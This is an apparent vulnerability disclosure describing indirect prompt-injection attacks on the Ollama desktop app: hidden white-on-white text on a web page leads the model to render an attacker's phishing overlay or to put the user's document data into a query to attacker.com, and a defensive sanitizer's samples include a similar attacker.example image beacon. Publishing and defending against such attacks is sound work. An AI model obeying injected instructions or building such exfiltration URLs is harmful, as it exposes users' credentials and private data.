Threat Intelligence

Unpatched Ollama Vulnerabilities: Phishing Overlays and Data Exfiltration

Ollama’s desktop app is vulnerable to phishing overlay and data exfiltration attacks via indirect prompt injection, which can overwrite the app’s interface with an attacker’s site.

A hidden prompt injection in Ollama leads to phishing overlays and data exfiltration

Context

Ollama is a leading tool for leveraging AI models, with over 170,000 stars on GitHub. Multiple vulnerabilities in the desktop app have been identified, enabling phishing and data exfiltration attacks.

The entire Ollama desktop interface can be overwritten by an attacker-controlled website via an indirect prompt-injection attack due to insecure rendering of model outputs.

Three zero-click data exfiltration vectors exploitable via indirect prompt injection were also identified.

Note: No human-in-the-loop approval steps are required for any attacks in this article.

These vulnerabilities were reported to the Ollama team on Dec 18, 2025, but no response was received despite four additional follow-ups. To ensure users are aware of these risks, this report is being disclosed publicly.

The Attack Chain

  1. The user asks Ollama about an external website or externally sourced file

    Ollama user asks AI for help with an online guide

  2. A prompt injection is hidden on the external site in 1 pt font, white-on-white text

    The online guide contains a hidden prompt injection

  3. The AI model is manipulated to output malicious HTML, overwriting the user interface with an attacker-controlled website

    The AI model is manipulated to believe it must output an HTML element as part of its explanation to the user.

    Note: Quitting and re-opening Ollama does not close the malicious overlay.

    An attacker's phishing site renders over the Ollama interface

  4. The attacker logs the credentials entered into the malicious overlay

    The attacker's server logs display the victim's credentials

Data Exfiltration Attacks

In addition to the phishing risk noted above, three zero-click data exfiltration vectors that are exploitable via indirect prompt injection were identified.

  • Data exfiltration via insecure web search tooling

  • Data exfiltration via insecure rendering of Markdown image outputs

  • Data exfiltration via insecure rendering of external HTML elements

Below is a data exfiltration attack chain that weaponizes insecure web search tooling:

Note: This attack uses the same malicious website, but with a different prompt injection.

  1. A data source containing a prompt injection is ingested (website, document, etc.)

    The user asks Ollama for help understanding an online guide

  2. The AI model is manipulated to access a malicious URL, exfiltrating data from documents the user has been working with

    The model is manipulated to construct a URL on the attacker’s domain, placing data from the victim’s previously uploaded documents in the query parameters.

    attacker.com/?data={AI puts the user’s data here}

    Data is exfiltrated when the model makes a request to the attacker-controlled URL

  3. The attacker’s server logs the model’s request, including the victim’s data

    The attacker can read the exfiltrated data from their server logs

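As an added example (not PromptArmor’s or Ollama’s code), the following Python guard sits between the model and the renderer and illustrates mitigations for the three issues above: raw HTML in model output is escaped so it renders as text rather than an overlay, Markdown images whose URL is off an allowlist or carries a query string (the exfiltration channel described above) are dropped, and the web-fetch tool is gated by the same host allowlist. The allowlist, host names and sample outputs are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Constructed allowlist: hosts the UI may render images from and the web tool may fetch.
ALLOWED_HOSTS = {"docs.example.com"}

HTML_TAG_RE = re.compile(r"</?[A-Za-z][^>]*>")
MD_IMAGE_RE = re.compile(r"!\[[^\]]*\]\(\s*([^)\s]+)[^)]*\)")


def url_is_allowed(url: str, allow_query: bool = False) -> bool:
    """Accept only http(s) URLs to allowlisted hosts. Rendered images may carry no
    query string or fragment, since that is where injected data gets smuggled out."""
    p = urlparse(url.strip())
    if p.scheme not in ("http", "https"):
        return False
    if (p.hostname or "").lower() not in ALLOWED_HOSTS:
        return False
    return allow_query or (p.query == "" and p.fragment == "")


def sanitize_model_output(text: str) -> tuple:
    """Returns (safe_text, findings). Any HTML tag in the model output is escaped so
    it is displayed literally; Markdown images failing the allowlist are replaced."""
    findings = []
    if HTML_TAG_RE.search(text):
        findings.append("html")
        text = text.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")

    def _check_image(m):
        url = m.group(1)
        if url_is_allowed(url):
            return m.group(0)
        findings.append("image:" + url)
        return "[image removed]"

    return MD_IMAGE_RE.sub(_check_image, text), findings


def tool_fetch_allowed(url: str) -> bool:
    """Gate for the web search/fetch tool: the model may only request allowlisted hosts."""
    return url_is_allowed(url, allow_query=True)


if __name__ == "__main__":
    # Constructed model outputs: one benign, one HTML overlay attempt, one image beacon.
    for sample in [
        "Open settings: ![settings](https://docs.example.com/settings.png)",
        'Guide: <div class="overlay">Sign in to continue</div>',
        "Summary ![x](https://attacker.example/?data=contents-of-report.docx)",
    ]:
        print(sanitize_model_output(sample))
```

The same `url_is_allowed` check applies to Markdown links, which the renderer should treat like images when they are auto-fetched or previewed.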

Responsible Disclosure

Timeline

Dec 18, 2025    PromptArmor discloses to Ollama
Jan 20, 2026    PromptArmor follows up
Jan 26, 2026    PromptArmor follows up
Jan 29, 2026    PromptArmor follows up
Feb 19, 2026    PromptArmor follows up
May 28, 2026    Article published